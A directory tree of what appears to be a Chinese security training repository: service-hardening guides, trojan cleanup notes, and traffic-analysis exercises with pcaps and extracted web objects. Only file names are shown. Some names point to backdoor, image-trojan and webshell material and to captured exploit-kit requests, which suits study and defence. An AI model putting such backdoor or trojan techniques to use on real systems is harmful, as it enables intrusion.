├── .gitignore
├── README.md
├── 数据泄露
└── 文件泄露.md
├── 服务加固
├── FTP加固.md
├── apache加固.md
├── mysql加固.md
├── nginx加固.md
├── pic
│ ├── 2019-07-30-01-47-11.png
│ ├── 2019-07-30-01-48-30.png
│ ├── 2019-07-30-01-49-44.png
│ ├── 2019-07-30-01-49-58.png
│ ├── 2019-07-30-01-50-13.png
│ ├── 2019-07-30-01-50-22.png
│ ├── 2019-07-30-01-50-45.png
│ ├── 2019-07-30-01-51-03.png
│ ├── 2019-07-30-02-59-43.png
│ ├── 2019-07-30-03-00-13.png
│ ├── FTP.png
│ ├── ac.png
│ ├── app.png
│ ├── ca1.png
│ ├── dc.png
│ ├── ip.png
│ ├── log.png
│ ├── pw.png
│ └── sg.png
├── samba加固.md
├── ssh安全配置.md
├── tomcat加固.md
├── vnc加固.md
└── 解析漏洞总结.txt
├── 木马病毒治理
├── example
│ ├── 1.png
│ └── 1的副本.png
├── pic
│ └── 2019-07-24-16-32-25.png
├── suid shell和inetd后门.md
├── 克制不死马.md
└── 生成图片马.md
├── 流量分析
├── 1
│ ├── .DS_Store
│ ├── 1.traffic-analysis-exercise-answers.pdf
│ ├── page
│ │ ├── %2f
│ │ ├── %2f(1)
│ │ ├── %2f(2)
│ │ ├── %3fPHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7cZDJiZjZiZjI5Yzc5OTg3MzE1MzJkMmExN2M4NmJiOTM
│ │ ├── %3fPHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7cZDJiZjZiZjI5Yzc5OTg3MzE1MzJkMmExN2M4NmJiOTM(1)
│ │ ├── GLinkPing.aspx%3fIG=aee5908ea2d64991aa8b8996fd170a75&&ID=SERP,5091.1
│ │ ├── IMG-20130928-WA002-150x150.jpg
│ │ ├── P1260499-200x298.jpg
│ │ ├── br_logo.gif
│ │ ├── donate_on.gif
│ │ ├── facebook_on.gif
│ │ ├── favicon.ico
│ │ ├── functions.js
│ │ ├── index.php%3freq=jar&num=3703&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7CZDJiZjZiZjI5Yzc5OTg3MzE1MzJkMmExN2M4NmJiOTM
│ │ ├── index.php%3freq=jar&num=9229&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7CZDJiZjZiZjI5Yzc5OTg3MzE1MzJkMmExN2M4NmJiOTM
│ │ ├── index.php%3freq=mp3&num=16&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7CZDJiZjZiZjI5Yzc5OTg3MzE1MzJkMmExN2M4NmJiOTM
│ │ ├── index.php%3freq=mp3&num=803295&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7CZDJiZjZiZjI5Yzc5OTg3MzE1MzJkMmExN2M4NmJiOTM
│ │ ├── index.php%3freq=mp3&num=95&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7CZDJiZjZiZjI5Yzc5OTg3MzE1MzJkMmExN2M4NmJiOTM
│ │ ├── index.php%3freq=swf&num=7533&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7cZDJiZjZiZjI5Yzc5OTg3MzE1MzJkMmExN2M4NmJiOTM
│ │ ├── index.php%3freq=swf&num=809&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7cZDJiZjZiZjI5Yzc5OTg3MzE1MzJkMmExN2M4NmJiOTM
│ │ ├── index.php%3freq=xml&num=2527&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7cZDJiZjZiZjI5Yzc5OTg3MzE1MzJkMmExN2M4NmJiOTM
│ │ ├── index.php%3freq=xml&num=9345&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7cZDJiZjZiZjI5Yzc5OTg3MzE1MzJkMmExN2M4NmJiOTM
│ │ ├── jquery-migrate.min.js%3fver=1.2.1
│ │ ├── jquery.form.min.js%3fver=3.50.0-2014.02.05
│ │ ├── jquery.js%3fver=1.10.2
│ │ ├── jquery.php
│ │ ├── lsp.aspx
│ │ ├── newsletter_on.gif
│ │ ├── notfound.gif
│ │ ├── page-list.css%3fver=4.2
│ │ ├── reset.css
│ │ ├── scripts.js%3fver=3.7.2
│ │ ├── squareorangedecor.gif
│ │ ├── style.css
│ │ ├── styles.css%3fver=3.7.2
│ │ ├── twitter_on.gif
│ │ └── youtubelogo_on.gif
│ ├── pic
│ │ ├── 2019-07-15-10-17-47.png
│ │ ├── 2019-07-15-10-45-11.png
│ │ ├── 2019-07-15-15-40-47.png
│ │ ├── 2019-07-15-15-49-59.png
│ │ ├── 2019-07-15-16-04-03.png
│ │ ├── 2019-07-15-16-16-31.png
│ │ ├── 2019-07-15-16-22-16.png
│ │ └── 2019-07-16-09-02-08.png
│ ├── writeup_level1.md
│ ├── writeup_level2.md
│ ├── writeup_level3.md
│ └── 题目内容
│ │ ├── .DS_Store
│ │ ├── bak
│ │ ├── .DS_Store
│ │ └── traffic-analysis-exercise.pcap.zip
│ │ ├── traffic-analysis-exercise.pcap
│ │ └── 题目说明.md
├── 2
│ ├── 2.traffic-analysis-exercise-answers.pdf
│ ├── page
│ │ ├── %2f
│ │ ├── %3fCC=1&party=8
│ │ ├── %3fpartnerid=32&partneruserid=2670201883056171348
│ │ ├── %3fparty=8
│ │ ├── %3fsite=6612&size=1&iframe=0&url=http%3A%2F%2Fhijinksensue.com%2Fassets%2Fverts%2Fhiveworks%2Fad2.html&src=http%3A%2F%2Fhijinksensue.com%2F&store=0
│ │ ├── %3fsite=6612&size=3&iframe=0&url=http%3A%2F%2Fhijinksensue.com%2Fassets%2Fverts%2Fhiveworks%2Fad3.html&src=http%3A%2F%2Fhijinksensue.com%2F&store=0
│ │ ├── %3fxid=HhLG4HXq9vhIeSEKMF3ZwA9p
│ │ ├── &rp_s=c&kw=Hijinksensue.com&tg_i.Site=Hijinksensue(1).com&p_pos=btf&p_screen_res=1440x900
│ │ ├── &rp_s=c&kw=Hijinksensue.com&tg_i.Site=Hijinksensue.com&p_pos=btf&p_screen_res=1440x900
│ │ ├── 105285-1416599054.jpg
│ │ ├── 14911&geo=eu&co=uk
│ │ ├── 14911&geo=eu&co=uk(1)
│ │ ├── 160x600(1).js
│ │ ├── 160x600.js
│ │ ├── 2014-10-09-hijinks-ensue-shut-up-forever-nycc.jpg
│ │ ├── 2014-11-12-the-objectification-of-my-affection.jpg
│ │ ├── 300x250(1).js
│ │ ├── 300x250.js
│ │ ├── 60380-1402972769.jpg
│ │ ├── 8223.js
│ │ ├── Become-My-Patron-HijiNKS-ENSUE-Patreon.png
│ │ ├── EA7YS.png
│ │ ├── ENFWAKJWN2NOB3
│ │ ├── EUX8814430706565938986
│ │ ├── GenericUserSync.ashx%3fdpid=695
│ │ ├── GetAd.aspx%3ftagver=1&ca=VIEWAD&cp=543045&ct=171251&cwod=&epid=&esid=&tppg=&brk=false&ccid=&wp=0&cf=160X600&asv=9&rq.d2s&mrnd=13270594&if=2&tl=1&pxy=10,862&cxy=160,600&dxy=664,4248&tz=0&ln=en-US,en-US,en-US
│ │ ├── GetAd.aspx%3ftagver=1&ca=VIEWAD&cp=543045&ct=171255&cwod=&epid=&esid=&tppg=&brk=false&ccid=&wp=0&cf=728X90&asv=9&rq=1.d2s&mrnd=95067192&if=2&tl=1&pxy=257,14&cxy=728,90&dxy=664,4248&tz=0&ln=en-US,en-US,en-US
│ │ ├── GetAd.aspx%3ftagver=1&ca=VIEWAD&cp=543045&ct=171256&cwod=&epid=&esid=&tppg=&brk=false&ccid=&wp=0&cf=300X250&asv=9&rq.d2s&mrnd=6676550&if=2&tl=1&pxy=726,853&cxy=300,250&dxy=664,4248&tz=0&ln=en-US,en-US,en-US
│ │ ├── Patreon-Patron-Homepage-Banner-button.png
│ │ ├── Pixietrix_bar.png
│ │ ├── Pug%3fvcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9ODImdGw9MTU3NjgwMCZkcF9pZD0yMg==&piggybackCookie=pcv%3a1%7cuid%3a2670201883056171348
│ │ ├── __utm.gif%3futmwv=5.6.1&utms=1&utmn=2001744075&ut.utmcsr%3Dgoogle%7Cutmccn%3D(organic)%7Cutmcmd%3Dorganic%7Cutmctr%3D(not%2520provided)%3B&utmjid=1664800447&utmredir=1&utmmt=1&utmu=qhAgAAAAAAAAAAAAAAABAAgE~
│ │ ├── __utm.gif%3futmwv=5.6.1&utms=1&utmn=273739202&utmhn=hijink.utmcsr%3Dgoogle%7Cutmccn%3D(organic)%7Cutmcmd%3Dorganic%7Cutmctr%3D(not%2520provided)%3B&utmjid=865499983&utmredir=1&utmu=qAAAAAAAAAAAAAAAAAABAAAE~
│ │ ├── aLzXu.png
│ │ ├── ad%3fmode=7&publisher_dsp_id=2&external_user_id=2670201883056171348
│ │ ├── ad1(1).html
│ │ ├── ad1.html
│ │ ├── ad2(1).html
│ │ ├── ad2.html
│ │ ├── ad2.html&src=http%3A%2F%2Fhijinksensue.com%2F&psa=1&store=0
│ │ ├── ad3(1).html
│ │ ├── ad3.html
│ │ ├── ad3.html&src=http%3A%2F%2Fhijinksensue.com%2F&psa=1&store=0
│ │ ├── adsbygoogle.js
│ │ ├── amazon_wishlist(1).png
│ │ ├── amazon_wishlist.png
│ │ ├── analytics.js
│ │ ├── archive.png
│ │ ├── bTr7A.jpg
│ │ ├── bd%3fddc=1&pid=54&cver=1&uid=3884367492064796893
│ │ ├── bd%3fddc=1&pid=65&uid=9159036d-2278-41eb-a2a6-005ea0fda2ce
│ │ ├── becomepatron-300x132.png
│ │ ├── birds.php%3fwinter=3
│ │ ├── bridge%3fAG_PID=cxweb&AG_SETCOOKIE
│ │ ├── bridge.gif%3fAG_PID=cxweb
│ │ ├── buttons.e4555501611b28342aaa51f891321a01.css
│ │ ├── buttons.js
│ │ ├── ca-pub-2206980995601434.js
│ │ ├── cars.php%3fhonda=1185&proxy=2442&timeline=4&jobs=823&image=171&join=757&list=679
│ │ ├── checkOAuth.esi
│ │ ├── collect%3fv=1&_v=j31&a=1557284084&t=pageview&_s=1&dl=http%3A%2F%2Fhijinksensue.com%2F&dr=http%3A%2F%2Fwww.google.co.uk%2Furl%3Fsa%3Dt%26rct%3Dj%26q%3D%26esrc%3.1416704325&tid=UA-43318206-1&_r=1&z=1898867393
│ │ ├── comiceasel.css%3fver=4.0.1
│ │ ├── context_sync%3fcall_type=iframe
│ │ ├── contextweb
│ │ ├── contextweb%3f
│ │ ├── contextweb(1)
│ │ ├── cookiematch%3fpnid=3000001
│ │ ├── cookiematch%3fpnid=3000007
│ │ ├── cse%3fa=Q&B=11
│ │ ├── cw.aspx
│ │ ├── cw.aspx%3feqcc=1
│ │ ├── cw_match
│ │ ├── dalek-earrings-etsy-science-and-fiction.png
│ │ ├── ddc.htm%3fuid=2670201883056171348&rnd=3029923604757506388&fpid=6&nu=n&t=&sp=y&purl=&ctid=3&cyid=18
│ │ ├── ddc.htm%3fuid=2670201883056171348&rnd=3030489853245811028&fpid=12&nu=y&t=&sp=n&purl=&ctid=3&cyid=18
│ │ ├── ddsmoothmenu.js
│ │ ├── devicepx-jetpack.js%3fver=201447
│ │ ├── e-201447.js
│ │ ├── ecw
│ │ ├── email-rss.png
│ │ ├── erb
│ │ ├── eshop.css
│ │ ├── external-tracking.min.js%3fver=6.4.8
│ │ ├── facebook.png
│ │ ├── favicon(1).ico
│ │ ├── favicon.ico
│ │ ├── firstin.png
│ │ ├── fl.js
│ │ ├── ga.js
│ │ ├── getAllAppDefault.esi%3fcb=stLight.allDefault&app=all&publisher=fecb1d16-9f7a-4da8-9415-97bd6d462585&domain=hijinksensue.com
│ │ ├── getCommentCounts.php%3fsrc=wp-2&acct=8a0af3bf63e5b4d028fdce394ae84550&ids=6390%7c6318%7c6263%7c6255%7c&guids=http%253A%252F%252Fhijinksensue.com%252F%253Fpost_type%253Dcomic%2526%2523038%253Bp%253D6390%7cht
│ │ ├── getSegment.php%3fpurl=http%3A%2F%2Fhijinksensue.com%2F&jsref=http%3A%2F%2Fwww.google.co.uk%2Furl%3Fsa%3Dt%26rct%3Dj%26q%3D%26esrc%3Ds%26frm%3D1%26source%3Dweb%26cd%3D1%26ved%3D0CCEQFjA.d2s&rnd=1416704334812
│ │ ├── getjs.aspx%3faction=VIEWAD&cwrun=200&cwadformat=160X600&cwpid=543045&cwwidth=160&cwheight=600&cwpnet=1&cwtagid=171251
│ │ ├── getjs.aspx%3faction=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=543045&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=171256
│ │ ├── getjs.aspx%3faction=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=543045&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=171255
│ │ ├── getjs.static.js%3fv=9
│ │ ├── googleplus.png
│ │ ├── hijinks-ensue-explosm-store-banner-closing.png
│ │ ├── hijinksensue(1).com
│ │ ├── hijinksensue(2).com
│ │ ├── hijinksensue(3).com
│ │ ├── hijinksensue.com
│ │ ├── hive_small.png
│ │ ├── index.af8ee42509cd42bac797c7d40600835b.html
│ │ ├── instagram.png
│ │ ├── jetpack.css%3fver=3.2.1
│ │ ├── jquery-migrate.min.js%3fver=1.2.1
│ │ ├── jquery.js%3fver=1.11.1
│ │ ├── jumpbar.js
│ │ ├── k%3ftstmp=3701802802
│ │ ├── keynav.js
│ │ ├── lastin.png
│ │ ├── lg.php%3fbannerid=257&campaignid=84&zoneid=188&loc=1&referer=http%3A%2F%2Fhijinksensue.com%2Fassets%2Fverts%2Fhiveworks%2Fad3.html&cb=1d2fbd9c4c
│ │ ├── lg.php%3fbannerid=258&campaignid=84&zoneid=187&loc=1&referer=http%3A%2F%2Fhijinksensue.com%2Fassets%2Fverts%2Fhiveworks%2Fad2.html&cb=dd7bc72eec
│ │ ├── lg.php%3fbannerid=259&campaignid=84&zoneid=186&loc=1&referer=http%3A%2F%2Fhijinksensue.com%2Fassets%2Fverts%2Fhiveworks%2Fad1.html&cb=e24c9c24bd
│ │ ├── lightbox.min.css%3fver=1.3.4
│ │ ├── m%3Fpartner%3Dcontextweb%26pr%3D&x=2014-12-23
│ │ ├── mapuser%3fproviderid=1006;userid=2670201883056171348&cfp
│ │ ├── match
│ │ ├── match%3fpublisher_dsp_id=4&external_user_id=2670201883056171348
│ │ ├── menubar.js
│ │ ├── merge%3fpid=1&3pid=2670201883056171348
│ │ ├── mf_gig_calendar.css%3fver=4.0.1
│ │ ├── navstyle.css%3fver=4.0(1).1
│ │ ├── navstyle.css%3fver=4.0.1
│ │ ├── next.png
│ │ ├── next_bar.png
│ │ ├── osd.js
│ │ ├── p-01-0VIaSjnOLg.gif%3ftags=CONTEXTWEB.ARTSENTERTAINMENT.ANIMATIONCOMICS,PUBLISHER.543045,,CAMPAIGN..0,,ADSIZE.160X600
│ │ ├── p-01-0VIaSjnOLg.gif%3ftags=CONTEXTWEB.ARTSENTERTAINMENT.ANIMATIONCOMICS,PUBLISHER.543045,,CAMPAIGN..0,,ADSIZE.300X250
│ │ ├── p-01-0VIaSjnOLg.gif%3ftags=CONTEXTWEB.ARTSENTERTAINMENT.ANIMATIONCOMICS,PUBLISHER.543045,,CAMPAIGN..0,,ADSIZE.728X90
│ │ ├── paypal-donate.gif
│ │ ├── pc%3fptnr=21272&sig=7f55db33fbb1aeb3132ef7151d50c9d9
│ │ ├── pixel%3fgoogle_nid=contextweb&google_cm&google_sc
│ │ ├── pixel%3fgoogle_nid=contextweb&google_cm=&google_sc=&google_tc=
│ │ ├── pixel%3fgoogle_nid=rubicon&google_cm&google_sc
│ │ ├── pixel%3fgoogle_nid=turn1&google_cm&google_sc&google_hm=MjY3MDIwMTg4MzA1NjE3MTM0OA==
│ │ ├── pixel%3fgoogle_nid=turn1&google_cm=&google_sc=&google_hm=MjY3MDIwMTg4MzA1NjE3MTM0OA==&google_tc=
│ │ ├── pixel.gif
│ │ ├── pixel.htm%3ffpid=12
│ │ ├── pixel.htm%3ffpid=6&sp=y
│ │ ├── pixel;r=944351996;a=p-QAjpCznqPvtcy;fpan=1;fpa=P0-2087113824-1416704338797;ns=1;ce=1;cm=;je=1;sr=1440x900x24;enc=n;dst=0;et=1416704338789;tzo=0;ref=http%3A%2F%2Fhijinksensue.com%2F;url=http%3A%2F%.html;ogl=
│ │ ├── pixel;r=962079744;a=p-QAjpCznqPvtcy;fpan=0;fpa=P0-2087113824-1416704338797;ns=1;ce=1;cm=;je=1;sr=1440x900x24;enc=n;dst=0;et=1416704338800;tzo=0;ref=http%3A%2F%2Fhijinksensue.com%2F;url=http%3A%2F%.html;ogl=
│ │ ├── plugin_styles.css%3fver=4.0.1
│ │ ├── potter-and-daughter-podcast-logo-hijink-ensue.png
│ │ ├── prev.png
│ │ ├── prev_bar.png
│ │ ├── pwa.js
│ │ ├── quant.js
│ │ ├── random.png
│ │ ├── remoteVisit.php%3facct=8a0af3bf63e5b4d028fdce394ae84550&time=1416704342760
│ │ ├── rss.png
│ │ ├── rtset%3fdo=add&pid=530739&ev=953c5471-3146-4100-842e-42d2f51ed228
│ │ ├── rtset%3fdo=add&pid=531292&ev=AO-00000001603461914&rurl=http%3A%2F%2Fm.xp1.ru4.com%2Fmeta%3F_o%3D179638%26_t%3Ddm%26ssv_p%3Dcw%26ssv_u%3DAO-00000001603461914
│ │ ├── rtset%3fdo=add&pid=531399&ev=1vatedxky20a0
│ │ ├── rtset%3fdo=add&pid=534301&ev=b8ae958e-8ce7-4147-abf4-fc6575575407
│ │ ├── rtset%3fdo=add&pid=534890&ev=a5ebfbe6-5bf6-4c99-bbe1-8c987dc29b9c
│ │ ├── rtset%3fdo=add&pid=535039&ev=71ed7c70-266f-492a-98b1-1f57252856d5
│ │ ├── rtset%3fdo=add&pid=535461&ev=2670201883056171348
│ │ ├── rtset%3fdo=add&pid=537085&ev=B70D3C90EA1E3B08ACED786CDDDAAB4B
│ │ ├── rtset%3fdo=add&pid=537583&ev=
│ │ ├── rtset%3fdo=add&pid=539152&ev=e0a85e00-72ab-11e4-acf5-78e7d1f6c9c0
│ │ ├── rtset%3fdo=add&pid=541254&ev=Q4699907261613324076
│ │ ├── rtset%3fdo=add&pid=543793&ev=21a36550-cb6a-452b-b193-8c271968bc29
│ │ ├── rtset%3fdo=add&pid=545979&ev=3884367492064796893
│ │ ├── rtset%3fdo=add&pid=547259&ev=CAESEFh8jtKteB8-6T46JcNvxuw&google_cver=1
│ │ ├── rtset%3fdo=add&pid=551764&tk=umts&v=1416703938.0&ev=54712fc15cb50947d90d71ee
│ │ ├── rubicon
│ │ ├── rubicon.ashx%3fver=1
│ │ ├── rum%3fcm_dsp_id=4&external_user_id=2670201883056171348
│ │ ├── saf-quidditch-harry-potter-necklace(1).jpg
│ │ ├── saf-quidditch-harry-potter-necklace.jpg
│ │ ├── sd%3fcc=1&id=537073061&val=2670201883056171348
│ │ ├── setuid%3fentity=43&code=2670201883056171348
│ │ ├── show_ads_impl.js
│ │ ├── spacer-100x3.png
│ │ ├── spacer.gif
│ │ ├── spcjs.php%3fid=68
│ │ ├── st.b6e4d3877b23e766b3266142878889f2.js
│ │ ├── style(1).css
│ │ ├── style.css
│ │ ├── sync%3fssp=pulsepoint
│ │ ├── sync%3ftype=gif&key=turn&uid=2670201883056171348
│ │ ├── sync%3ftype=red&dsp=28
│ │ ├── tap(1).php%3fv=4212&nid=1185&put=2670201883056171348&expires=60
│ │ ├── tap.php%3fv=&nid=revenuemantra&put=77AE070A5A317154BE049888025D87F0&expires=30
│ │ ├── tap.php%3fv=11581&nid=2395&put=Q4699907261613324076
│ │ ├── tap.php%3fv=13490&nid=2596&put=639581516736103713&expires=30
│ │ ├── tap.php%3fv=14240&nid=2676&put=aYevYlsz6hsUdWtdD8KdhSBvD9RwlhPk0&expires=30
│ │ ├── tap.php%3fv=14321&nid=2313&put=R37_634C322B_3E24D0EB&expires=60
│ │ ├── tap.php%3fv=16726&nid=2751&put=7c0af117-5a27-48fb-afd6-f293410c9915&expires=30
│ │ ├── tap.php%3fv=17329&nid=2867&put=bf1e90ee-9372-4980-b7ff-f246d9f1fd72&expires=30
│ │ ├── tap.php%3fv=18014&nid=2950&put=e20f11d1-72ab-11e4-94e0-005056a24b29
│ │ ├── tap.php%3fv=4212&nid=1185&put=2670201883056171348&expires=60
│ │ ├── tap.php%3fv=4222&nid=1512&put=953c5471-3146-4100-842e-42d2f51ed228
│ │ ├── tap.php%3fv=4894&nid=1986&put=3884367492064796893&expires=30
│ │ ├── tap.php%3fv=5672&nid=2082&put=74657683113&expires=30
│ │ ├── tap.php%3fv=7206&nid=1197&put=a28801f7-8325-4ecf-bab9-51bd586f6f5e
│ │ ├── tap.php%3fv=7751&nid=2249&expires=30&put=CAESEIea4DPLGYo5H_twqmOqqVo&google_cver=1
│ │ ├── tpui%3ftpid=30&tpuid=2670201883056171348&nut&uu=419351416704327349
│ │ ├── transparent-spacer-150x10(1).png
│ │ ├── transparent-spacer-150x10.png
│ │ ├── tumblr.png
│ │ ├── twitter.png
│ │ ├── u.php%3fp=328546547221502&m=2670201883056171348&t=2592000
│ │ ├── upcoming-appearances-widget-header-2.png
│ │ ├── url%3Fsa%3Dt%26rct%3Dj%26q%3D%26esrc%3Ds%26frm%3D1%26source%3Dweb%26cd%3D1%26ved%3D0CCEQFjAA%26url%3Dhttp%253A%252F%252Fhijinksensue.com%252F%26ei%3DLjFxVOC5NYb5aoaPgpgE%26usg%3DAFQjCNELeNnamHiwI67vxYsN.d2s
│ │ ├── url%3fsa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=1&ved=0CCEQFjAA&url=http%3A%2F%2Fhijinksensue.com%2F&ei=LjFxVOC5NYb5aoaPgpgE&usg=AFQjCNELeNnamHiwI67vxYsNi-mZxfz_dw&bvm=bv.80185997,d.d2s
│ │ ├── user-registering%3fdataProviderId=147&userId=2670201883056171348
│ │ ├── visitormatch%3ftag=171251&pid=543045
│ │ ├── visitormatch%3ftag=171255&pid=543045
│ │ ├── visitormatch%3ftag=171256&pid=543045
│ │ ├── wVsIO.jpg
│ │ ├── wordpressTemplateLinkWrapper2.php%3facct=8a0af3bf63e5b4d028fdce394ae84550
│ │ ├── wp-lightbox-2.min.js%3fver=1.3.4.1
│ │ ├── xrefid.xgi%3fna_exid=2670201883056171348&na_pid=1966&ru=
│ │ ├── youtube.png
│ │ └── zrt_lookup.html
│ ├── pic
│ │ ├── 2019-07-18-19-21-51.png
│ │ ├── 2019-07-18-19-24-04.png
│ │ ├── 2019-07-19-09-13-13.png
│ │ └── 2019-07-19-09-20-35.png
│ ├── writeup.md
│ └── 题目内容
│ │ ├── .DS_Store
│ │ ├── bak
│ │ └── 2014-11-23-traffic-analysis-exercise.pcap.zip
│ │ ├── traffic-analysis-exercise.pcap
│ │ └── 题目说明.md
├── 3
│ ├── .DS_Store
│ ├── 3.traffic-analysis-exercise-answers.pdf
│ ├── file
│ │ ├── .DS_Store
│ │ ├── 2fNECYxvaRhNgivqycm7mfyO70tDCcYnnkyzNqJ-9ax5HSDcERPdxHf3Ow1szmYw
│ │ ├── 2nAY-xQvz4JQqjC66P7SgvZGdjIrMJheyLnsQvXjBrLitaA-_K4Uh45BR0unHcom
│ │ ├── 3xdz3bcxc8
│ │ ├── 680VBFhpBNBJOYXebSxgwLrtbh3g6JFUllqksWFSsGshhwsguyNL26MGul2oZ3b8
│ │ ├── i_JnzurEICi4FQgJPm53aItUwat9SekFTU9d2KwmkCuLN2dPiuEjgSqCgiP8yIMk
│ │ ├── new_hex_data
│ │ └── xPF_HAXN7TK9bMAgBjZDwQzO1-Wf5GvrN5_lIReIhbrhqHAlWyTDbaOBMPWitjnX
│ ├── hex_xor.py
│ ├── page
│ │ ├── 0
│ │ ├── %2f
│ │ ├── %2f(1)
│ │ ├── %2f(2)
│ │ ├── %2f(3)
│ │ ├── %2f(4)
│ │ ├── %2f(5)
│ │ ├── %2f(6)
│ │ ├── %3fgfe_rd=cr&ei=caeAVNyDM86o8wf654FA
│ │ ├── %3fpt=sholic&t=d%7C%22Health%2520%2526%2520Fitness%22
│ │ ├── 02024870e4644b68814aadfbb58a75bc(1).php%3fq=e8bd3799ee8799332593b0b9caa1f426
│ │ ├── 02024870e4644b68814aadfbb58a75bc.php%3fq=e8bd3799ee8799332593b0b9caa1f426
│ │ ├── 2fNECYxvaRhNgivqycm7mfyO70tDCcYnnkyzNqJ-9ax5HSDcERPdxHf3Ow1szmYw
│ │ ├── 2nAY-xQvz4JQqjC66P7SgvZGdjIrMJheyLnsQvXjBrLitaA-_K4Uh45BR0unHcom
│ │ ├── 3xdz3bcxc8
│ │ ├── 544b29bcd035b2dfd055f5deda91d648.swf
│ │ ├── 680VBFhpBNBJOYXebSxgwLrtbh3g6JFUllqksWFSsGshhwsguyNL26MGul2oZ3b8
│ │ ├── Pug%3fvcode=bz0yJnR5cGU9MSZjb2RlPTE5ODUmdGw9NjQ4MDA=&piggybackCookie=46b354bc-7be3-11e4-83b3-00259035dd42
│ │ ├── PuwvqkdbcqU-fCZ9Ed-b7VQlYEbsez9cZjKsNMjLOwM.eot
│ │ ├── X5kdUZyupC9KX_WeU5hfyWt7lhUmYshtOfLiEn645Y4.js
│ │ ├── __utm.gif%3futmwv=5.6.1&utms=1&utmn=1740982548&ut.utmcsr%3Dgoogle%7Cutmccn%3D(organic)%7Cutmcmd%3Dorganic%7Cutmctr%3D(not%2520provided)%3B&utmjid=1052796345&utmredir=1&utmmt=1&utmu=CAAgAAAIACAAAAAAAAAAAAAE~
│ │ ├── __utm.gif%3futmwv=5.6.1&utms=2&utmn=168676361&utmhn=www.earsurgery.(1).utmcsr%3Dgoogle%7Cutmccn%3D(organic)%7Cutmcmd%3Dorganic%7Cutmctr%3D(not%2520provided)%3B&utmjid=&utmmt=1&utmu=CAAgAAAIACAAAAAAAAQAAAAE~
│ │ ├── __utm.gif%3futmwv=5.6.1&utms=2&utmn=168676361&utmhn=www.earsurgery.org.utmcsr%3Dgoogle%7Cutmccn%3D(organic)%7Cutmcmd%3Dorganic%7Cutmctr%3D(not%2520provided)%3B&utmjid=&utmmt=1&utmu=CAAgAAAIACAAAAAAAAQAAAAE~
│ │ ├── abg(1).js
│ │ ├── abg.js
│ │ ├── admin-ajax.php%3faction=shareaholic_share_counts_api&url.org%2F&services%5B%5D=twitter&services%5B%5D=facebook&services%5B%5D=google_plus&services%5B%5D=linkedin&services%5B%5D=email_this&services%5B%5D=all
│ │ ├── ads%3fclient=ca-pub-7254167034625173&format=189x600&output=html&h=600&slo.bGQ&rx=0&eae=4&fc=8&docm=9&brdim=10%2C515%2C2%2C438%2C1280%2C%2C800%2C546%2C784%2C438&vis=0&abl=CS&ppjl=f&pfx=0&fu=128&ifi=1&dtd=692
│ │ ├── ads%3fclient=ca-pub-7254167034625173&format=970x90_as&output=html&h=90&slotname=7.bGQ&rx=0&eae=4&fc=8&docm=9&brdim=10%2C515%2C2%2C438%2C1280%2C%2C800%2C546%2C784%2C438&vis=0&abl=CS&ppjl=f&fu=0&ifi=2&dtd=762
│ │ ├── adsbygoogle.js
│ │ ├── analytics.js
│ │ ├── analytics_frame.html
│ │ ├── banner_cholesteatoma.jpg
│ │ ├── banner_chronic_ear_pain.jpg
│ │ ├── banner_presented_by.jpg
│ │ ├── banner_vertigo.jpg
│ │ ├── banner_when_is.jpg
│ │ ├── border.png
│ │ ├── ca-pub-7254167034625173.js
│ │ ├── classic-popular.png
│ │ ├── cm%3fid=&esi=1&pt=sholic&google_error=3
│ │ ├── collect%3fv=1&_v=j31&a=839099032&t=pageview&_s=1&dl=http%3A%2F%2Fwww.earsurgery.org%2F&dr=http%3A%2F%2Fwww.google.at%2Furl%3Fsa%3Dt%26rct%3Dj%26q%3D%26esrc%3Ds.1417804061&tid=UA-22031114-1&_r=1&z=1894933272
│ │ ├── colorbox.css%3fver=4.0
│ │ ├── content-shortcodes.css%3fver=4.9.1
│ │ ├── controls.png
│ │ ├── css%3ffamily=Slabo+27px&lang=en
│ │ ├── css%3ffamily=Slabo+27px&lang=en(1)
│ │ ├── dashicons.eot
│ │ ├── dashicons.min.css%3fver=4.0
│ │ ├── ep%3fsid%5B%5D=3727514514&sid%5B%5D=3585802694&sid%5B%5D=3588953253&pt=sholic
│ │ ├── ermcm%3fxid=dU8yHjI4owkwK_qmGaybl1UE
│ │ ├── eurofxref-hist-90d.xml
│ │ ├── favicon(1).ico
│ │ ├── favicon.ico
│ │ ├── font-awesome.min.css
│ │ ├── font-awesome.min.css%3fver=4.0.3
│ │ ├── fontawesome-webfont(1).eot%3f
│ │ ├── fontawesome-webfont.eot%3f
│ │ ├── ga.js
│ │ ├── google-logo.png
│ │ ├── i_JnzurEICi4FQgJPm53aItUwat9SekFTU9d2KwmkCuLN2dPiuEjgSqCgiP8yIMk
│ │ ├── jquery-migrate.min.js%3fver=1.2.1
│ │ ├── jquery.colorbox-min.js%3fver=4.0
│ │ ├── jquery.js%3fver=1.11.1
│ │ ├── jquery.min.js
│ │ ├── loading.gif
│ │ ├── loading_background.png
│ │ ├── m%3Fpartner%3Dcontextweb%26pr%3D&x=2015-01-03
│ │ ├── m%3fp=rmx&xid=s0xp2j64Hk0zLiNmAuLpBrXS
│ │ ├── mapuser%3fproviderid=1025&userid=46b354bc-7be3-11e4-83b3-00259035dd42&cfp
│ │ ├── mixer.gif%3fp_name=AN&p_id=8086419245598832333
│ │ ├── navigation.js%3fver=20120206
│ │ ├── nessie_icon_tiamat_white(1).png
